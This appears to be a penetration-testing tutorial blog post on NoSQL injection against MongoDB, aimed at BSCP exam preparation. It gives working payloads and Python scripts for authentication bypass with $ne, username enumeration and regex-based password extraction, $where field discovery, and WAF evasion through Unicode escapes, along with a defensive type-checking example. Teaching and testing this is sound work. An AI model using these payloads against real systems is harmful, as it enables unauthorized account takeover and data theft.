Unmasking Hidden Data: How I Automate NoSQL Injection for BSCP and Beyond



Introduction:

NoSQL injection has emerged as a critical web application vulnerability, paralleling traditional SQL injection threats in modern applications leveraging databases like MongoDB. While tools exist, many pentesters find existing solutions cumbersome or unreliable for consistent exploitation during certifications like the BSCP, leading to a demand for customizable, script-based approaches that provide greater control and understanding of the exploitation process.

Learning Objectives:

  • Understand the fundamental mechanics of NoSQL injection attacks against MongoDB databases.
  • Learn to deploy custom Python scripts for enumerating users, dumping passwords, and extracting document structures.
  • Master operational security and methodology for adapting these scripts to diverse NoSQL environments and pentest scenarios.

You Should Know:

1. NoSQL Injection Fundamentals & Tool Limitations

NoSQL databases, particularly MongoDB, use query languages based on JSON-like documents rather than traditional SQL. Common injection points include login forms, API endpoints, and search functionalities that directly process user input into database queries without proper sanitization. While tools like NoSQLMap exist, they often lack reliability for specific pentest scenarios, fail against certain application logic, or don’t provide the granular control needed for certification exams and professional engagements.

The core vulnerability arises when user input is passed into a query object without type enforcement. Because MongoDB treats an embedded object as an operator expression, an attacker who can submit JSON (rather than a plain string) controls the comparison itself. For example, a login handler might use code like:

query = {"username": request.json['username'], "password": request.json['password']}  # values taken as-is, no type check
user = db.users.find_one(query)

An attacker could bypass authentication by sending:

{"username": "admin", "password": {"$ne": "wrongpassword"}}

This makes the query match the admin document as long as its password is not "wrongpassword", so find_one returns it and the login succeeds without knowledge of the password.

2. Environment Setup and Script Configuration

Before exploitation, establish a proper testing environment. For practice, set up a vulnerable Node.js/MongoDB application or use dedicated vulnerable machines. The scripts require Python 3 with the requests library installed.

Installation command:

pip3 install requests

Clone the repository from the provided GitHub link (after URL expansion):

git clone https://github.com/saledo/nosqli-scripts
cd nosqli-scripts

Critical configuration areas in each script include:

  • Target URL (ensure it’s authorized for testing)
  • Headers (Content-Type, cookies, authentication tokens)
  • Payload structures tailored to the vulnerable parameter
  • Success/failure indicators in server responses

3. User Enumeration Through Conditional Responses

The user enumeration script works by injecting operators that create boolean conditions, then analyzing response differences to determine valid usernames.

Sample command execution:

python3 nosqli_user_enum.py -u http://target.com/api/login -d '{"username":"$USER$","password":"$PASSWORD$"}' -w users.txt

(The original listing used -u for both the target URL and the wordlist; -w is assumed here for the wordlist, so check the script's --help for its actual option names.)

The script typically uses the `$regex` operator with systematic username testing:

payload = {"username": {"$regex": "^admin$"}, "password": {"$ne": ""}}

If the application returns a different HTTP status code (200 vs 401) or response length for valid versus invalid users, the script can identify existing accounts. Response analysis is crucial—some applications return generic errors but have subtle differences in timing, length, or hidden error messages.

4. Password Extraction Using Pattern Matching

Once valid usernames are identified, password extraction employs similar conditional logic with character-by-character reconstruction.

The script might use:

# Check password length first: ^.{20}$ matches exactly 20 characters,
# whereas .{20} alone also matches any longer password
payload = {"username": "admin", "password": {"$regex": "^.{20}$"}}

# Then extract characters, anchored to the start of the value
payload = {"username": "admin", "password": {"$regex": "^a"}}  # First character 'a'?
payload = {"username": "admin", "password": {"$regex": "^b"}}  # First character 'b'?

For optimized extraction, employ binary search techniques with character ranges, extending the known prefix one character at a time:

payload = {"username": "admin", "password": {"$regex": "^[a-m]"}}  # First half of alphabet?

Two caveats: regex metacharacters in the recovered prefix (., *, $, [ and so on) must be escaped before being fed back into the pattern, and this recovers whatever is stored in the field, so against a properly hashed password it yields the hash, not the password.

A Windows PowerShell one-liner for generating a simple wordlist (each letter repeated 1 to 10 times; `..` binds tighter than `+`, so the two character ranges are concatenated):

1..10 | % { $length = $_; 65..90 + 97..122 | % { [char]$_ } | % { "$_" * $length } } | Out-File -FilePath patterns.txt
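The enumeration loop of section 3 and the length check, character-by-character extraction and binary-search optimisation of section 4 all run against a live target in the post's scripts. The following is an added example, not code from the post or from the nosqli-scripts repository: it simulates the whole attack offline. `VulnerableLogin` is a hypothetical stand-in for an endpoint that passes the parsed JSON body straight into find_one(), `matches()` is a minimal stand-in for MongoDB's filter evaluation (only $ne, $regex and $exists, and using Python's re rather than MongoDB's PCRE, so escaping with re.escape is an approximation of what you would do against a real server), and the user records are constructed sample data with plaintext passwords as in the BSCP lab. The request counter shows why halving the candidate set matters.

```python
import re
import string

# Constructed sample collection (plaintext passwords, as in the BSCP lab).
USERS = [
    {"username": "wiener", "password": "peter"},
    {"username": "administrator", "password": "a1b2.c3"},
    {"username": "carlos", "password": "montoya"},
]


def matches(doc, query):
    """Minimal stand-in for MongoDB filter evaluation.

    A dict as a field value is treated as an operator object, which is exactly
    the behaviour the injection relies on. Only $ne, $regex and $exists exist.
    """
    for field, cond in query.items():
        value = doc.get(field)
        if not isinstance(cond, dict):
            if value != cond:
                return False
            continue
        for op, arg in cond.items():
            if op == "$ne":
                if value == arg:
                    return False
            elif op == "$regex":
                if not isinstance(value, str) or re.search(arg, value) is None:
                    return False
            elif op == "$exists":
                if (field in doc) != bool(arg):
                    return False
            else:
                raise ValueError(f"unsupported operator {op}")
    return True


class VulnerableLogin:
    """Hypothetical endpoint that passes the parsed JSON body straight to find_one()."""

    def __init__(self):
        self.requests = 0  # counts probes, to compare linear vs halving search

    def post(self, body):
        self.requests += 1
        return 200 if any(matches(u, body) for u in USERS) else 401


def oracle(target, username, password_cond):
    """True when the injected filter matched some document (the 200 vs 401 signal)."""
    return target.post({"username": username, "password": password_cond}) == 200


def enumerate_users(target, wordlist):
    # {"$ne": ""} on the password makes the match depend on the username alone.
    return [u for u in wordlist if oracle(target, u, {"$ne": ""})]


def password_length(target, username, max_len=64):
    # ^.{n}$ is an exact-length test; .{n} alone would also match longer passwords.
    for n in range(1, max_len + 1):
        if oracle(target, username, {"$regex": f"^.{{{n}}}$"}):
            return n
    return None


def extract_password(target, username, alphabet=string.printable.strip()):
    """Recover the password one position at a time, halving the candidate set per probe."""
    length = password_length(target, username)
    if length is None:
        return None
    known = ""
    for _ in range(length):
        cands = list(alphabet)
        while len(cands) > 1:
            half = cands[: len(cands) // 2]
            # Escape everything: the prefix and the candidates may contain . * $ [ etc.
            cls = "[" + "".join(re.escape(c) for c in half) + "]"
            if oracle(target, username, {"$regex": "^" + re.escape(known) + cls}):
                cands = half
            else:
                cands = cands[len(cands) // 2:]
        known += cands[0]
    # Confirm the full value, in case some character was outside the alphabet.
    if not oracle(target, username, {"$regex": "^" + re.escape(known) + "$"}):
        return None
    return known


if __name__ == "__main__":
    target = VulnerableLogin()
    for user in enumerate_users(target, ["admin", "wiener", "administrator", "carlos"]):
        print(user, extract_password(target, user), "requests so far:", target.requests)
```

With a 94-character alphabet the halving search needs at most 7 probes per position instead of up to 94, which is the difference between a few seconds and a blocked IP on a rate-limited target.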

5. Document Field Discovery with $where Operator

MongoDB's `$where` operator evaluates a JavaScript expression against each document, enabling attackers to discover document structure by testing field existence. Two preconditions: the operator has to land at the top level of the filter (it is not valid nested under a field), and the server must have server-side JavaScript enabled (the `security.javascriptEnabled` mongod setting), which hardened deployments turn off.

The script injects payloads like:

{"$where": "this.secret_field !== undefined"}

If the document contains 'secret_field', the query returns the document; otherwise, it doesn't match. To systematically discover fields:

import requests

target_url = "http://target.com/api/login"  # authorized target only

potential_fields = ["password", "ssn", "credit_card", "api_key", "token"]
for field in potential_fields:
    # Test presence, not truthiness: "this.field && true" misses empty strings and 0
    payload = {'$where': f'this.{field} !== undefined'}
    response = requests.post(target_url, json=payload)
    if "success_indicator" in response.text:
        print(f"Field exists: {field}")

This probing is necessary precisely because MongoDB is schemaless: there is no schema to read, so the only way to learn which fields a document carries is to ask the document. Note that the application may still filter certain fields from its output, so a field can exist and match without ever appearing in a response.

6. Bypassing Common Defenses and WAFs

Modern applications often implement Web Application Firewalls (WAFs) and input validation that block common NoSQL operators. Evasion techniques include:

  • Encoding payloads (Unicode, hex, base64)
  • Using alternative operator syntax
  • Splitting operators across multiple parameters
  • Adding comments or whitespace

Example with encoding (the JSON parser decodes \u escapes before the object reaches the driver, so MongoDB still receives $ne while a rule matching the raw body never sees it):

# Instead of direct $ne operator
payload = {"username": "admin", "password": {"\u0024ne": ""}}

# Or with mixed encoding
payload = {"username": "admin", "password": {"$n\u0065": ""}}

Note that Python decodes these escapes in the source literal, so sending the dict with requests' json= parameter puts a literal $ne on the wire. To actually test the bypass, build the body as a string yourself and send it with data= and a Content-Type: application/json header.

Time-based blind extraction, for when valid and invalid responses are otherwise indistinguishable (the server-side JavaScript environment used by $where provides sleep()):

{"$where": "if (this.password[0] == 'a') { sleep(5000); return true; } else { return false; }"}
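The encoding bypasses above work against any defence that inspects the raw body before JSON decoding, and fail against any defence that inspects the decoded object. The following added example (not code from the post or its repository) makes that concrete: a hypothetical raw-body WAF rule, a post-parse check for operator keys (the same idea as express-mongo-sanitize's stripping of `$` keys in Node), and a hardened version of the section 1 login handler that simply enforces scalar types. The request bodies are constructed for the example.

```python
import json
import re

# Constructed request bodies: the direct operator, the two encodings from the
# text above, and a benign login. Raw strings keep the backslashes for json.loads.
DIRECT = r'{"username":"admin","password":{"$ne":""}}'
ESCAPED = r'{"username":"admin","password":{"\u0024ne":""}}'
MIXED = r'{"username":"admin","password":{"$n\u0065":""}}'
BENIGN = r'{"username":"admin","password":"hunter2"}'

# Hypothetical WAF rule that pattern-matches operators in the raw body.
RAW_OPERATOR_RE = re.compile(r'"\$(ne|gt|gte|lt|lte|in|nin|regex|where|exists)"')


def waf_blocks(raw_body):
    """Raw-body inspection: sees the bytes before any JSON decoding."""
    return RAW_OPERATOR_RE.search(raw_body) is not None


def has_operator_keys(value):
    """Post-parse inspection: any key beginning with '$' anywhere in the tree."""
    if isinstance(value, dict):
        return any(k.startswith("$") or has_operator_keys(v) for k, v in value.items())
    if isinstance(value, list):
        return any(has_operator_keys(v) for v in value)
    return False


def hardened_login_filter(raw_body):
    """Hardened handler: parse first, then enforce scalar types.

    Returns the filter that would be passed to find_one, or None if rejected.
    An operator object cannot survive this because it is a dict, not a str.
    """
    body = json.loads(raw_body)
    username, password = body.get("username"), body.get("password")
    if not isinstance(username, str) or not isinstance(password, str):
        return None
    return {"username": username, "password": password}


def assess(raw_body):
    """Compare the three vantage points for one request body."""
    parsed = json.loads(raw_body)  # what the application and the driver actually see
    return {
        "waf_blocks": waf_blocks(raw_body),
        "operator_reaches_db": has_operator_keys(parsed),
        "hardened_accepts": hardened_login_filter(raw_body) is not None,
    }


if __name__ == "__main__":
    for name, body in [("direct", DIRECT), ("escaped", ESCAPED), ("mixed", MIXED), ("benign", BENIGN)]:
        print(f"{name:8} {assess(body)}")
```

Only the direct form trips the raw-body rule; all three injected bodies decode to a `$ne` key and reach the driver unchanged, and all three are rejected by the type check. That is the practical lesson of this section from the defender's side: validate the parsed object, not the bytes.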

7. Integrating with Burp Suite for Advanced Testing

While the post mentions limitations with Burp Suite alone, combining custom scripts with Burp’s proxy functionality creates a powerful workflow.

Configure Burp as a proxy for your Python scripts:

import requests
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
requests.post(target, json=payload, proxies=proxies, verify=False)

For Burp Intruder, create custom payload positions targeting JSON parameters:

{"username":"§admin§","password":{"$ne":"§invalid§"}}

Export results from Burp and process with your scripts for correlation analysis, or use Burp’s logger extension to capture all traffic from automated scripts for later review.

What Undercode Say:

  • Custom scripting provides unparalleled adaptability for specific penetration testing scenarios where off-the-shelf tools fail, particularly during certification exams with unique constraints.
  • Understanding the fundamental operators and injection techniques matters more than tool proficiency, as NoSQL implementations vary widely across different databases and application frameworks.

The decision to create custom scripts rather than relying solely on existing tools represents a maturation in penetration testing methodology. While automated tools provide broad coverage, targeted scripts offer precision and reliability for specific engagement requirements. This approach is particularly valuable for MongoDB environments where injection techniques differ significantly from traditional SQL. The scripts’ modular design allows pentesters to rapidly adapt to different application contexts, response patterns, and defensive measures. As NoSQL databases continue evolving, this foundational understanding of injection principles will remain valuable even as specific payloads require updating. The emphasis on the $where operator demonstrates advanced technique application beyond basic authentication bypass, enabling comprehensive document structure discovery that reveals sensitive data fields not apparent through normal application behavior.

Prediction:

NoSQL injection techniques will rapidly evolve as more applications migrate from traditional SQL databases, with defensive measures struggling to keep pace due to the flexibility and variation in NoSQL query languages. Within two years, we’ll see widespread adoption of NoSQL-specific WAF rules and developer education programs, but simultaneous emergence of new bypass techniques leveraging operator chaining, type confusion, and server-side JavaScript execution. The cybersecurity industry will likely develop standardized NoSQL injection detection and prevention frameworks, but the fundamental challenge of securing schemaless databases against injection will persist due to their inherent flexibility and the difficulty of implementing uniform input validation across diverse query patterns.


Reported By: Sergio Aledo – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
